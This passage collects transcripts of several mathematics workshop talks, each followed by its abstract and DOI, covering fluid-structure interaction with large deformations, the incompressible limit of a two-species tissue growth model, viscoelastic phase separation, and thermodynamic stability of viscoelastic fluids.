actually this a priori estimate is more or less everything that is needed to later to go to the to pass to the limit and to the use the existence of weak solutions. Okay, because we know that these energy and dissipations are coercive in the right way. So this is actually already an a priori estimates, which tells you everything. So let me at this point tell you why a variational scheme is so useful. I mean, okay, it was easy. We compare just the minimizers and we got these energy estimates, but you could say, okay, why not? I mean, I'm not a fan of making variational schemes. I want to discretize my equation directly. So you could do that, of course, but then in order to get an a priori estimate, the standard way what you would do is to test by the velocity. This is something very standard. So in fact, if everything is discretized, we would test by this by this say discretized velocity. So the difference quotients. But if I do that, then I will be given terms which look like this one here. And actually in order to deduce an energy estimate, I would not like to have this gradients here or the derivatives here. I would actually like to estimate this by energies. But in order, I mean, this is just a chain rule. So if everything was continuous, the chain rule holds and everything is great. But once things are time discreet, there is a version of the discrete chain rule, which looks like this one and it would be correct. But it has a but this energy E has to be convex. And our energy is not convex and cannot be convex. So this is somehow the main reason why discretization of the equation directly will probably not lead to the right estimates. So this is something which tells you, no, you have to go to a variational approach. 
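Schematically, the comparison argument described above reads as follows (force terms and constants are only indicated, not taken from the slides):

```latex
% Test minimality of the new iterate against the competitor (\eta_k, 0):
E(\eta_{k+1})
 + \tau\,R\!\Bigl(\eta_{k},\tfrac{\eta_{k+1}-\eta_{k}}{\tau}\Bigr)
 + \tau\,R_{\mathrm{fluid}}(v_{k+1})
 \;\le\; E(\eta_{k}) + \tau\,(\text{force terms}).
% Summing over k and absorbing the force terms (Young/Korn) gives the a priori bound
\max_{k} E(\eta_{k})
 + \sum_{k}\tau\Bigl[R(\cdots) + R_{\mathrm{fluid}}(\cdots)\Bigr]
 \;\le\; C\bigl(E(\eta_{0}),\,f,\,T\bigr).
```

This is the energy-plus-integrated-dissipation bound referred to above; no discrete chain rule, and hence no convexity of the energy, is needed to obtain it.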
So this variational approach is really like the King's Road to get up to a reestimate in case of large deformations. OK, so once we have the existence of minimizers for our variational scheme, and once we have this energy estimate, we can derive an Euler Lagrange equation. In fact, the only reason why we can do this is that we had this regularized energy and we know that the Jacobian is bounded away from zero. Because in such a case, we can really take a variation and we can really arrive to an Euler Lagrange equation. We would not be able to do this without. But again, this is essential for us because convergence to the weak equation must be done on the level of these Euler Lagrange equations because we have the coupling of test functions. And this coupling of test functions is important for us because it gets risk for this difficult equality of tractions. So actually, once we have this Euler Lagrange equation and once we have the energy estimate, I just told you before, everything is ready and we can now really pass to the limit. The only maybe technical difficulties here to approximate test functions, right? Because the test functions depend on the solution, so they change in the convergence scheme. So one has to do a little some technical work there, but okay, so everything is more or less ready. So now you would say, okay, this was an easy situation because you skip the inertial term and the inertial terms are the only hard ones and you would be right. So now the question is, how can I extend this idea, which seems to be a good one, in case if inertia is present. So let me just have a look at here the equation for the solids. So now before we just consider this part here, the derivatives of the energy and this inertial term we just skipped. Okay, but now I want to get added back to the game, but now I have some incompatibility having here because we saw before that we need to have a variational approximation scheme in order to get a priori estimates because of this non-convexity. On the other hand, if I discretize this inertial term in the most, I mean by some midpoint scheme or whatever, then if I try to compare minimizers, this will never give me the right a priori estimate. Actually for this inertial term, the right thing to do would be to take the equation and to test the equation by the velocity as we did before. This is something I cannot do because I do not have the equations if I minimize. So you could say, oh, so maybe the Euler Lagrange equation and the minimizing problem are equivalent, but they are not because we are working with a non-convex energy. So somehow we have to come up with something and the idea here is that we introduce kind of two levels of approximation. We introduce one level of approximation for this inertial term and then I found a level of approximation for this energy terms. So let me just make a quick argument how this goes. So we take the first level. Oh, so then it's very quick because I only have like two more slides or something. So we first discretize this inertial term by some constant H and once this is discretized, we are in the same situation as we were in the parabolic case. Just like if the inertial term was even not there. So we use the same thing we did before. We may take some minimization problem, pass to the limit and then we are in the continuous case and can deduce further a priori estimates. So this is what I want to have. 
And let me just give you a one-second rough idea of what happens if I also add the inertial term for the fluid, which is the hardest part, because we have these terms here. So what I have to do is to discretize it by something like how the Navier-Stokes equation is actually derived. I have to introduce kind of a flow map, so kind of Lagrangian coordinates for the fluid on a very short time step, and discretize it by this flow map. Okay, so this is maybe only the rough idea. So let me just point you to the take-home messages. We want to have these large structural deformations; because of the non-convexity in the energy, this calls for a variational approach. And if we want to include inertia in the variational approach, we need two levels of approximation. So thank you for your attention. And this is the reference. So thank you.
In this talk we consider the interaction of a Stokes/Navier-Stokes flow with a viscoelastic body. The elastic body is allowed to undergo large deformations (but no self-collisions). In order to handle this situation correctly, we devise a variational approximation scheme in the spirit of De Giorgi for the combined problem. Moreover, by using a two-scale scheme, we also extend this approach to the hyperbolic regime including inertia of the solid body. These variational approaches allow us to prove proper energetic estimates while also controlling the geometric restrictions posed on the solid body and, eventually, to establish existence of weak solutions.
10.14288/1.0398147 (DOI)
So, thanks to Agnieszka and Miroslav for the invitation to speak here. I must say that the weather in Banff is much better than I expected. So what I'm going to talk about is a relatively simple or, well, at least harmless-looking system of PDEs with possible applications to the biology of tumor growth and living tissues in general. And this is going to be describing some recent results with Benoît Perthame, Markus Schmidtchen and Nicolas Vauchelet. Oh, okay. So let me dive straight into the equations. So we consider this advection-reaction system of equations for two species, healthy cells and abnormal cells, if you will, which are advected by the gradient of this potential W, which is related to the pressure via this equation, which we call Brinkman's law. And on the right-hand side, you have growth rates for the cells, which importantly depend on the pressure. In a sense, the pressure is the most important factor here, which controls the proliferation of the cells through what is called contact inhibition, meaning that when the pressure gets too high, the cells are going to sense it and they will just stop dividing. And in this compressible model that I want to present here, the pressure is supposed to be related to the total cell density via a smooth increasing function, and we take for simplicity this power law, which we've seen this week several times already, I think. Okay. So let me mention briefly what the goal is. The incompressible limit that is in the title corresponds to passing to the limit k to infinity in this relation here. And therefore, we would obtain a limiting model, which would give us a different description of the tissue, a more geometric, if you will, description of the motion of the tumor. Let me start with a few remarks. So if you consider just one equation in the absence of viscosity, meaning formally you take nu equal to zero here, then the velocity is related to the pressure gradient via Darcy's law, and you just obtain the porous medium equation. And the issue of this limit k to infinity is a long story with a well-developed mathematical theory, the limiting equation here being the classical Hele-Shaw model for an incompressible fluid with a free boundary. And there have been plenty of generalizations of this, including proliferation, including nutrients as well, and also extending to systems like we have for two species. However, an important thing to remark here is that for the system, the incompressible limit is only understood in one dimension. So it's still not a complete story in this regard. Of course, all those generalizations that I mentioned, they still use heavily this connection to the porous medium equation; in particular for the system, the equation for the total cell density that you obtain by just adding the two equations gives you a porous medium type equation. And you can, for instance, try to derive some adaptation of the classical Aronson-Bénilan regularizing effect, which helps in the analysis. In the viscous case, on the other hand, which we are considering, there are some other mathematical, analytical problems; in particular, even though viscosity has a regularizing effect, the estimates on the pressure are weaker, and this makes it much more strenuous in the end to obtain compactness. In particular, this is due to jump discontinuities of the pressure, both at the boundaries of the supports of the cell densities and on the internal layers where the two populations meet. Okay.
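For orientation, here is a schematic transcription of the two-species system just described; the normalization of the power law is my guess, since the talk only says the pressure is a smooth increasing function of the total density:

```latex
\partial_t n_{1} - \operatorname{div}\bigl(n_{1}\,\nabla W\bigr) = n_{1}\,G_{1}(p), \qquad
\partial_t n_{2} - \operatorname{div}\bigl(n_{2}\,\nabla W\bigr) = n_{2}\,G_{2}(p),
\\
-\nu\,\Delta W + W = p \quad(\text{Brinkman's law}), \qquad
p = n^{k}, \qquad n = n_{1}+n_{2}.
```

Setting nu to zero formally replaces the elliptic equation for W by Darcy's law, which is the porous-medium setting recalled above.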
Yeah, so this is a very brief, incomplete discussion. Of course, let me just mention that there is a result concerning an incompressible limit for the Navier-Stokes system with a growth term, with a linear growth term by Abelina and Nikola Weschler, and we are actually, in part, we are using very similar techniques. Right. So here are the assumptions. We assume that the function G, that both the functions G, the rates of growth for the cells are decreasing in the pressure. This is what I already said, that the cells can sense the pressure, sense that when the pressure is absent, they want to divide the most that is possible, and as they do, the pressure increases, causing the cells to stop dividing, or at least divide at a smaller rate. So there is this sort of logistic effect here. In particular, there exists this pressure PM, which is the maximal pressure at which the proliferation stops altogether, hence the term homeostatic pressure. As for the data, we take non-negative data, integrable and bounded, such that they converge in the L1 or to some normal functions, and zero infinity. Okay. So before I can state the results, I need also to introduce some other variables and some other equations. So it is very useful in the analysis to consider an equation for the time evolution of the pressure, and also to introduce this variable Rk, which stands for the population concentration of population fraction, if you will. So this is using an equation for the total cell density obtained by just adding the two equations, and of course using the relation between the pressure and this total population density, which gives us this equation, while those population fractions satisfy that equation. And these are very important in all our analysis. In particular, one of the goals is to pass to the limit in the pressure equation. Okay. So let me advertise the results first, and then I'll discuss how we go about proving them. So we have existence and uniqueness of weak solutions to our initial problem. There's not much of an issue. The most important thing that I want to discuss in the title is this incompressible limit. So the main issue is to obtain compactness of the pressure, and we can do that and we can pass to the limit obtaining this system here, which corresponds biologically to a situation where the total population density is limited by some critical value one here. And in unsaturated regions, so when n is less than one, there is no pressure, and the cells are dividing, the populations are growing at different rates, but they are. And the fully saturated regimes where n is equal to this critical value, then the pressure is positive and it satisfies this relation, which comes from the right-hand side of the pressure equation. So that's the system that we converge to as we pass with k to infinity. And okay, let me point out one more thing. I will not speak too much about this segregation, but let me just mention that in the analysis of these kind of models, this is one of the typical questions that you want to address, namely, will the cells that make up the tissue, will they mix like in a homogeneous mixture or will a front form? This is important from the biological point of view. So I'm told that, for instance, immunotherapy can only work if the immune cells can actually mix within the tissue, and if they can't, then they are stopped by the front, and the therapy just won't work. Okay, so back to maths. Here are some estimates that we have. These are the first two are rather standard things. 
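Schematically, the limit system advertised a moment ago consists of the same transport equations and Brinkman law, with the stiff pressure law replaced by the constraints

```latex
0 \le n = n_{1}+n_{2} \le 1, \qquad p \ge 0, \qquad p\,(1-n) = 0,
```

so the pressure vanishes on the unsaturated set where n < 1, while on the saturated set where n = 1 the limit pressure is characterized by the relation inherited from the pressure equation (not reproduced here).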
We get positivity, we get L1, L-infinity bounds, but nothing more essentially. So in particular, no estimates on the pressure gradient. And one important thing here is this last line, which, as you can see, once I'm able to pass strongly to the limit in those nonlinear terms, this will give me this complementarity relation that we had here on this slide. Okay, so that's an important observation. It comes actually from considering the time evolution for this quantity here in the absolute value, and if you think of it, like, okay, forget the reaction terms for a minute, then you have just W minus P, which is the Laplacian of W. So we're considering the time evolution of the Laplacian of W. So this does have somehow this Aronson-Bénilan flavor, in a sense. Okay, at this point I would like, yes, I think we've managed it, I would like to split into two cases, one dimension and multi-dimension, because, well, that's how we did it for one reason, and also somehow the methods that are used are orthogonal, in a sense, so I think it's good to mention. So I said the main issue is to obtain strong compactness of the pressure, and in the one-dimensional case, this is possible from some additional regularity estimates on the cell densities. Okay, in particular, we have this lemma, which follows from a careful Gronwall estimate using heavily the structure of the problem, meaning the fact that the functions G are decreasing and also the fact that the pressure gradient has the same sign as the derivative of the total population density. This gives us some appropriate cancellations and helps to close the estimate. So given this additional regularity, we can prove compactness for the pressure sequence, and the main idea here is that even though we are not able to show directly that we control time and space shifts in the pressure itself, we are able to control them for a nonlinear function of the pressure, which actually can be seen from the proof of the previous lemma. And again, when you look at the function phi, this uses heavily this relation between the pressure and the total density. And then, eventually, this leads to compactness in the pressure, but I'll just skip the details. Okay, so this is all contained in this paper with Markus. So how about the multi-D case? Of course, the previous strategy fails miserably, and we need to look for something else. There are no BV estimates for the system in multi-D, so we need to look for some other ideas. And one idea is given by a previous work of Benoît and Nicolas, who considered an analogous problem in the case of just one species, where they could strengthen the weak convergence of the pressure coming from the a priori estimates to strong compactness by observing that the only obstacle to strong compactness is oscillations in the pressure around the value 0 and some other positive value which can be identified and which is related to the limiting velocity potential. And then, so what they do is they pass to the limit in the pressure equation using this knowledge and also using a representation of weak limits, of weak nonlinear limits of the pressure, which comes from a kinetic formulation. And then, yeah, this is enough for them for compactness. And so if we try to mimic this sort of approach, we run into problems very quickly, because now we have more involved nonlinearities, in the sense that we don't only have the pressure, but we also have this nonlinear population fraction.
So we somehow have to make sense of that to be able to apply this strategy. And to cut a long story short, we realized that the argument would be fine, it would work. Once we can guarantee that this sequence RK converges strongly. Okay, and hopefully, fortunately, this is the case. It does require a huge lot of effort to show this and it actually shifts the interest back from pressure to the individual densities and for them we are able to derive a compactness result and since I'm running out of time, and this is a short presentation, let me just mention that the main idea of the proof is to use this compactness method as in the paper for compression, for compressible fluids. So here's the final result. Having that, as I said, having compactness of the individual species, we can pass to the limit in the pressure equation and prove the main result. I think I'm out of time, so I'll just show you these. You still have one or two minutes. Okay, so I can just showcase this last slide with some other problems that are still open and I think very interesting in this field. As I mentioned before, the incompressible limits for the Darcy case is only known in one dimension because again in one dimension it was possible to have some BV estimates and pass to the limit in the multi-decay, it's not known what to do and also it would be interesting to see a rigorous derivation of a link between the two in the bring from the Darcy. Okay, that's it. Thank you. Okay, so let's thank Tomek. Thank you.
We study a two-species model of tissue growth describing dynamics under mechanical pressure and cell growth. The pressure is incorporated into the common fluid velocity through an elliptic equation, called Brinkman's law, which accounts for viscosity effects in the individual species. Our aim is to establish the incompressible limit as the stiffness of the pressure law tends to infinity - thus demonstrating a rigorous bridge between the population dynamics of growing tissue at a density level and a geometric model thereof.
10.14288/1.0398141 (DOI)
Thanks to Mika and Mira for this kind invitation and for the opportunity to speak in this workshop. Of course, it would be very nice to meet all of you in person, in Banff, but at least we have this opportunity to interact and discuss together. And today I would like to speak about our recent research results on viscoelastic phase separation. And this is joint work with Burkhard Dünweg and Dominic Spiller, who are from statistical physics, and the analytical part was done in cooperation with my PhD student, Aaron Brunk. So if I speak about phase separation, we might have different situations. So you might have a mixture in which there is no self-interaction in favor of one of the species. And maybe if the environment and situation change, maybe if you increase the temperature, then you might see the separation. So there is the self-interaction in one or the other species, as you see here. So we really see two separated phases. And as time evolves, typically these two phases try to reduce the contact area, and something like this will happen. And this situation is quite well understood. So in statistical physics, you will find something which is called model H, and in the mathematical literature you find the coupled Cahn-Hilliard-Navier-Stokes system. So for those of you who maybe don't know this equation, this is the Cahn-Hilliard equation; it's a fourth-order parabolic equation. Mu is the so-called chemical potential, and phi is sitting here for the volume fraction. So how much of one or the other phase do I have? And it's of course coupled to our well-known Navier-Stokes equations here. They are in the incompressible setting. And there is a coupling through this Korteweg stress tensor, as well as the viscosity, which might depend on phi. And there is a big literature on this model. But statistical physicists realized that this model might not be efficient enough if you are going to describe something like a transient gel. So it's a situation where one of the phases is the polymer. Well, and then I have the dynamic asymmetry of components, slow and fast. So the relaxation effects happen on different scales. And what I'm having here is the viscoelastic relaxation in pattern formation. Why pattern formation? Because typically the slow phase is trying to create a transient network structure. And what you see here is that the solvent flows through this network structure. It's like the porous media flow. And this phenomenon was, as far as I know, first pointed out by Tanaka 20 years ago. And he called it viscoelastic phase separation. He even proposed the model. And I will speak about that. So what you see in experiments, and this is the first row you have here, is firstly you have kind of a homogeneous structure. But as time evolves, the solvent, which is the gray part here, is aggregating. And you have the bubbles. They force the polymer to create this network-like structure, which you see here. We have the volume shrinking of the polymeric phase. The solvent phase aggregates more and more. And finally, the network structure is broken, as you see here. So this is the experiment. And it's really the experiment of polystyrene with this PVME. And that's the solvent. Do you know what it is? Polyvinyl methyl ether. So that is that. Whatever. These are the numerical simulations in 2 and 3D. And maybe I'll just show you the video. So you see now it comes. Now you will see the network structure of the polymer. The blue is the solvent. Finally, the network structure is broken.
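For reference, the "model H" / Cahn-Hilliard-Navier-Stokes coupling mentioned above is usually written as follows; constants and the precise form of the Korteweg term vary between papers, so this is one common convention rather than necessarily the slide's:

```latex
\partial_t\varphi + v\cdot\nabla\varphi = \operatorname{div}\bigl(m(\varphi)\,\nabla\mu\bigr), \qquad
\mu = -\,c_{0}\,\Delta\varphi + f'(\varphi),
\\
\partial_t v + (v\cdot\nabla)v
 = \operatorname{div}\bigl(\nu(\varphi)\,D(v)\bigr) - \nabla p
   - \operatorname{div}\bigl(c_{0}\,\nabla\varphi\otimes\nabla\varphi\bigr),
\qquad \operatorname{div} v = 0 .
```

Here f is the double-well mixing potential and the last divergence term is the Korteweg (capillary) stress coupling the flow to the interface.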
And if I let the video run further, you will see the classical phase separation. So at the end of the day, there will be the bubble and the rest. So what is the mathematical model behind it? So here are the terms which we are using in the description: polymer volume fraction phi, then the bulk stress, the viscoelastic stress, and the volume-averaged velocity. So what the bulk stress, which might be new for you, is doing for us: it's kind of an additional pressure. And the gradient of the bulk stress is acting from the polymer-rich phase into the solvent-rich phase. So it is oriented in the opposite direction from the way the polymer molecules flow or go. And so it effectively slows down the coagulation effects of the polymers, and it forces the polymer-rich phase to create this network-like structure. Fine. The model can be derived using GENERIC, or even using this consistent thermodynamical approach, where I prescribe the Helmholtz free energy and the entropy production. So what is the Helmholtz free energy, or the total energy? It's the mixing energy, the energy of the bulk stress, the energy of the viscoelastic part, and the kinetic energy. And I just go quickly through this page, which is about the Cahn-Hilliard part. So the mixing energy is the sum of the energy due to this mixing potential. It is actually a double-well potential. So if I am sitting in one or the other minimum, it's my equilibrium of one or the other phase. But you see there is the other mixing phenomenon appearing here. So in fact, I need some additional kick to go through this energy barrier from one to the other stable state. And then there is the additional term, which is actually a penalty term. Because to minimize the energy, the aim is to minimize the surface between the two phases. So that's kind of penalizing the interfaces between the two phases. Okay. So further. Okay. This is the model, which is the improvement of the Tanaka model. It was proposed in 2006 by Zhou, Zhang and Weinan E. And you see it's a model consisting of four PDEs. Let me just quickly describe what you have here. First of all, let us concentrate on these first black terms. This is nothing else, just the Cahn-Hilliard. So it is a diffuse interface model. And then this phi equation is coupled with the reaction-diffusion equation for the bulk stress. And we have two diffusive terms. So if you look at the phi equation and the Q equation, you see this cross-diffusion phenomenon, which we have here. And this makes the dynamics, well, or the analysis a little bit more complicated. On top of that, I have the Navier-Stokes equation. And of course, I have the coupling with the volume fraction equation through this Korteweg stress, and the coupling with the viscoelastic stress evolution. And they used, or they proposed, the Oldroyd-B model. But of course, you can use your favorite viscoelastic model, or model for the evolution of the viscoelastic stress tensor, depending on which material you are modeling. So these models have been used for numerical simulations quite successfully. And we were asking ourselves, what can be done for the understanding from the mathematical point of view? Can we say that a global weak solution exists? Is it maybe unique, or unique in some sense? And to this end, we have decided to replace the equation for the viscoelastic stress tensor by the equation for the conformation tensor. That's not a problem, because the conformation tensor is just the shifted viscoelastic stress tensor. I denote it now by capital T. We use a Peterlin-kind representation.
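The Helmholtz free energy described above collects four contributions; schematically (the elastic potential of the conformation tensor is left generic, since the talk's Peterlin-type choice is not spelled out in the transcript):

```latex
E_{\mathrm{tot}}
 = \underbrace{\int_{\Omega}\Bigl(\tfrac{c_{0}}{2}\,|\nabla\varphi|^{2} + F(\varphi)\Bigr)dx}_{\text{mixing}}
 + \underbrace{\int_{\Omega}\tfrac12\,q^{2}\,dx}_{\text{bulk stress}}
 + \underbrace{\int_{\Omega}\tfrac12\,|v|^{2}\,dx}_{\text{kinetic}}
 + \underbrace{\int_{\Omega} W_{\mathrm{el}}(\mathbb{C})\,dx}_{\text{viscoelastic}},
```

with F the double-well mixing potential (Ginzburg-Landau in the regular case, Flory-Huggins in the singular case) and W_el a generic elastic potential of the conformation tensor.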
So I allow more generally a more nonlinear dependence here. So usually you will just have C minus I. The most important change with respect to the model I showed you before is that I have diffusive dynamics. So I allow here a very small diffusion coefficient in the viscoelastic evolution equation, as well as in the Q equation, because they are responsible for similar effects. Now the whole system is dissipative. I have the total energy, which consists of the mixing energy, the energy of the bulk stress, the kinetic energy and the viscoelastic energy. And the model is a dissipative model. On top of that, we have additionally a Lyapunov functional for this system, which is of this type. So now I have really the L2 norm of C. And for that, we have the following inequality. I would just like to point out that there is this additional term which has the minus sign. And well, so D is, I cannot say anything about the sign of D, but it doesn't matter. I can put it on the right-hand side, do the Gronwall argument, and I get the estimates which are needed. So for example, I can tell you a priori in which spaces my solutions will live. And due to this cross-diffusion effect, I have however this term. So from this term, I cannot really tell you in which space the gradient of mu, the chemical potential, is living. So we need to do something with that. So first of all, let me mention something about the existence, and we can prove that we have a global weak solution in 2D, and we are now writing down the result for 3D. So in order to show the existence of a global weak solution, I proceed in two steps. First of all, I will consider the regular case, and I will tell you what it is. And then the singular case, which is maybe more interesting for physicists, is proven as a sequence of regular approximations. So what about the regular case? If I can go back to show you the model again, you see that I have this mobility function sitting here. I have this relaxation coefficient, the coefficient a. And they all depend on phi. And I assume that these are nice. So it means all of these parametric functions are continuous, bounded positively from below, and they are bounded from above. I assume that my mobility function will not be zero, so I do not get the degenerate parabolic situation. And I assume that this mixing double-well potential is of polynomial type and it is the so-called Ginzburg-Landau potential. So that's the regular case. In the singular case, I will allow the logarithmic, Flory-Huggins potential, which physicists like more. And I will also allow that the mobility function really vanishes, but only if I am sitting in one or the other phase. Okay. So what about the regular case? So here is the result. I have the global weak solution. Well, more or less standard spaces. So for the velocity, the spaces that you would assume; sigma means the solenoidal space. Phi, right? It's the volume fraction. There we have the bi-Laplacian. So really we can show that it is in L2H2 and L-infinity H1. And we can show that the chemical potential is in L2H1. So how to do that? There are two steps. First of all, we do the classical energy method and Galerkin estimates. And they will tell you, well, from the energy — I showed you the energy — so you are not quite surprised that I have this information. But in the energy, I had this term, right? So I only have that this difference is in L2H2. And I would like to have the information really on the chemical potential.
So how to do that? For that, I do something like entropy estimates. So it means I construct the entropy function, which is a, well, convex function, having its minimum at one half. And then I use G prime as the test function in the Cahn-Hilliard equation. So you can think that I am doing a renormalization of the Cahn-Hilliard equation, which gives me this entropy equation. And building on that, if I do a little bit more, well, Hölder estimates, I end up with the information on phi, which is important for me. And I end up with the information that the chemical potential is living in L2H1. Mária, can I ask you something? Andre here. Yes. In the second displayed line of mathematics, I don't understand this modulus sign that is around the minus. Did you not have earlier a combination of these terms without these modulus signs around the minus? Yes. Is that a typo? I think we can derive that. But you can, I mean, what is important here is really that you have the difference, right? So we, as you said, we have the difference between these two in L2L2. That's the important information. And from that, we don't know what the gradient of mu is. We cannot say what the gradient of mu is. But doing this renormalized Cahn-Hilliard equation, I get this information. That's the message. Yes. So what I'm saying is, before, you had an absolute value of the difference, and now you have a difference of absolute values. Yes, I know. Yeah. But isn't it just a simple estimate that you, from below, estimate the absolute value of the difference by the difference of absolute values? Yeah. Yeah, exactly. But it is not essential here. You can think, you have the information of the difference, say in absolute values. You have the information of the difference of absolute values, and I can derive from that, by doing this entropy renormalization, the information on the gradient of mu. And that's, like, what the point is. So now, and okay, so the singular case can be done by the sequence of these regular cases, and a little bit more work with the entropy equation, which gives me that phi is in L-infinity and almost everywhere really lives between 0 and 1. Now, what about the uniqueness? Of course, we might have many weak solutions, but at least, can we say something about weak-strong uniqueness? And the answer is yes. However, we have to do a little bit of something, because the whole energy is not convex. I have the term which is the integral of F there, and F is a double-well potential. So if I just apply the standard technique, like doing a first-order Taylor expansion, it will not help me. But what can one do? One can add a penalty term. So I mean, you remember I had these squared norms, right? So that's the term coming from the mixing energy, and then we have the energy for q, the kinetic energy, and this elastic energy. And here we have the expansion of the double-well potential, and that will be not convex. So I will convexify the whole relative energy. And of course, this can be done by taking a penalty-term approach. And it's interesting that this concept is of course known in statistical physics, and it is the statistical distance or Bregman distance in the phase space with respect to the energy landscape. In our community, we know that this relative energy can be used to study the weak-strong uniqueness. And indeed, we were able to derive the relative energy inequality. So if z is the weak solution and z hat is the strong solution starting from the same initial data, I have this inequality.
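A sketch of the entropy (renormalization) trick discussed in the exchange above, in the standard form used for Cahn-Hilliard equations with non-constant mobility; the precise choice of G in the talk may differ, and the defining property assumed here is G''(s) = 1/m(s):

```latex
% Choose a convex entropy G with minimum at 1/2 and G''(s) = 1/m(s).
% Testing the phi-equation with G'(\varphi) gives, formally
% (the transport term vanishes for divergence-free v),
\frac{d}{dt}\int_{\Omega} G(\varphi)\,dx
 = \int_{\Omega}\operatorname{div}\bigl(m(\varphi)\nabla\mu\bigr)\,G'(\varphi)\,dx
 = -\int_{\Omega}\nabla\mu\cdot\nabla\varphi\,dx .
```

Since the chemical potential contains -Δφ, integrating by parts in the last term produces a good contribution controlling ∫|Δφ|², which is the extra piece of information on φ used, together with the energy bound, to place the chemical potential in L2H1, as claimed above.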
And since they start from the same initial data, I have zero on the right hand side. And now D is really the dissipative term. So this is the term we have discussed. It's all of them have the sign, right? So this is really positive. So at the end of the day, we have the weak strong uniqueness. So the weak solution coincide with the strong solution on its lifespan. Now, if I go to the relative energy inequality, I can use it even in other setting or other situation. If I take any, okay, enough small arbitrary functions that had and plug it into the equation, I get some residual. And this residual, if I control them, I can say how far will be z from z hat. So for example, in numerics, I can do the following. I can take my z will be my numerical solution. And that hat will be my exact solution, exact weak solution, which is projected into the finite element space. And for that, it is not so difficult to derive this residual. It's more or less interpolation errors. So this will tell me what is the numerical error. I can control the numerical error in this way. And it was like deja vu for me if I have seen that many coarse-graining models in statistical physics and really in polymer research, what people are deriving, they are derived from the so-called relative entropy. And that's exactly as it is. So they derive coarse-graining model using the relative entropy, which is in our case, relative energy. And I see more potential here to really do rigorous analysis between the fine-scale model and the coarse-grained model. Okay, I finished with two experiments. You remember the picture which I showed you at the beginning. And so we have 40% of polymer. And now at the initial data, and I am in rest. And now I randomly perturbed it and the random perturbation is very small. And now I can ask how good is my numerical method or how good is the simulation I showed you. So here you see it. This is the measure refinement with respect to, like, finest of the method. And here this is the relative energy. And for this experiment, the relative energy gives me the first order. And if I change it, so I do not take the random perturbation, but small, very oscillatory, but, like, smooth perturbation, and do the same, then the relative energy even decreases with the second order. And I did not tell you what is the method. So it is the characteristic method, finite element. But I mean, it's just the, like, illustration that this relative energy can be really used to discuss also the convergence order numerical method. And with that, I will stop and thank you for your attention. Thank you very much, Maria, for your lecture.
Mathematical modelling and numerical simulations of phase separation becomes much more involved if one component is a macromolecular compound. In this case, the large molecular relaxation time gives rise to a dynamic coupling between intra-molecular processes and the unmixing on experimentally relevant time scales, with interesting new phenomena, for which the name "viscoelastic phase separation" has been coined. Our model of viscoelastic phase separation describes time evolution of the volume fraction of a polymer and the bulk stress leading to a strongly coupled (possibly degenerate) cross-diffusion system. The evolution of volume fraction is governed by the Cahn-Hilliard type equation, while the bulk stress is a parabolic relaxation equation. The system is further combined with the Navier-Stokes-Peterlin system, describing time evolution of the velocity and (elastic) conformation tensor. Under some physically relevant assumptions on boundedness of model parameters we have proved that global in time weak solutions exist. Further, we have derived a suitable notion of the relative energy taking into account the non-convex nature of the energy law for the viscoelastic phase separation. This allows us to prove the weak-strong uniqueness principle and consequently the uniqueness of a weak solution in special cases. Our extensive numerical simulations confirm robustness of the analysed model and the convergence of a suitable numerical scheme with respect to the relative energy.
10.14288/1.0398136 (DOI)
First, what I mean by stability. So imagine that in your system you have a steady state and you introduce a perturbation and if the steady state is stable, then the perturbation should decay in time and you will recover the steady state, right? So this means that the two solutions that are starting from different initial conditions, they are approaching each other as time goes to infinity, right? So just a warning, this is not the concept of continuous dependence of thermodynamical processes upon initial state and supply term. This is the thing that is used in the theory of hyperbolic systems and that typical result is that the two solutions that are starting from two different initial conditions, they are diverging at most exponentially fast, right? So here I want something stronger, I want the solutions to approach a common limit. And of course, if you have such a physical system that looks stable, then the question is whether you can prove such a behavior from the governing equations and preferably would like to use some thermodynamical concepts. Because when you are developing models, you always claim that the model is thermodynamically consistent and it makes it far superior than other models. So you would like to use that hard work that was done in the derivation of the model in some qualitative analysis of the system, right? So now I will show you that it's possible. So concerning stability, there are basically two types of systems that are thermodynamically isolated systems and in these systems everything is easy, straightforward and boring, right? So isolated systems means that you have a fluid inside the vessel and there is no thermal energy exchange with the surrounding and no mechanical energy exchange with the surrounding. And what you expect if you have some flow inside such a vessel or deformation, whatever it is, as T goes to infinity, you will finally end up with spatially homogeneous fields. Velocity will be equal to zero and the temperature field will be constant in space. So regarding the application of thermodynamical methods in the stability analysis in this simple case, everything is clear. All you have to do is to follow this quotation, right? So this comes from Clausius. So the energy of the world, world means thermodynamically isolated system, right? So this is the translation. It's constant and the entropy of the world is rising, right? So this verbal statement gives you a kind of first guess on what should be your Lyapunov functional in the system. So your Lyapunov functional maybe is the entropy, the net entropy in the system, and then you have to enforce all the constraints, right? So the conservation of energy, constant mass in the case of polymers, the number of polymeric particles and so on and so on. And what is important here that this Lagrange multiplier here that is enforcing the conservation of energy, this is known to be one over temperature. And why it works? So if you differentiate this thing in time, then you know the entropy is rising. So minus entropy is decreasing and this is constant, these are constant terms. So you get minus derivative of entropy and this has a sign. So this is a nice guess. But in practice, it can be quite complicated, but in recent years, we have spent a lot of time in identification of energy storage ability in materials and entropy production ability in materials, right? 
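The verbal recipe above can be written schematically as follows; here Ê, Ŝ and θ̂ denote the equilibrium energy, entropy and temperature, and further constraints such as mass would enter with their own multipliers:

```latex
V_{\mathrm{eq}}
 = -\bigl(S - \widehat{S}\bigr) + \frac{1}{\widehat{\theta}}\,\bigl(E_{\mathrm{tot}} - \widehat{E}_{\mathrm{tot}}\bigr),
\qquad
\frac{dV_{\mathrm{eq}}}{dt} = -\,\frac{dS}{dt} \le 0
\quad\text{(isolated system: } E_{\mathrm{tot}} \text{ constant, } S \text{ non-decreasing).}
```

This is exactly the "entropy plus constraints" guess described in the paragraph above, and it is the object whose fine correction is needed for thermodynamically open systems.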
So we know for a wide class of viscoelastic rate type fluids, what should be there as the energy and what should be there as an entropy production, right? So some of these formulas were known before and some of these formulas, especially for the viscoelastic rate type fluids with stress diffusion or some more exotic models, we have done it in our group, right? And while how it is related to Professor Rajakopal, so he's the person who kind of suggested this approach, right? So every material is characterized by its energy storage ability and entropy production ability. And we know how to write down the entropy, the energy and so on. So we can plug it into this function and we can try whether it works. So that's good, but in practice, you are not interested in thermodynamically isolated systems, right? So it makes no sense, right? So we are interested in systems that are allowed to interact with the surrounding. So what you can expect here, so you have thermodynamically open systems. So this is the system where you have mechanical energy exchange with the surrounding and thermal energy exchange with the surrounding. So you have some non-trivial flow pattern inside the vessel. And if you introduce a perturbation, basically two things can happen. The perturbation will die out and the original flow pattern is recovered or other scenario could be okay. So if you introduce a perturbation, then the perturbation will grow in time. Somehow it arranges the flow in such a way that it sucks the energy from the outside environment and it has enough energy to change the flow pattern 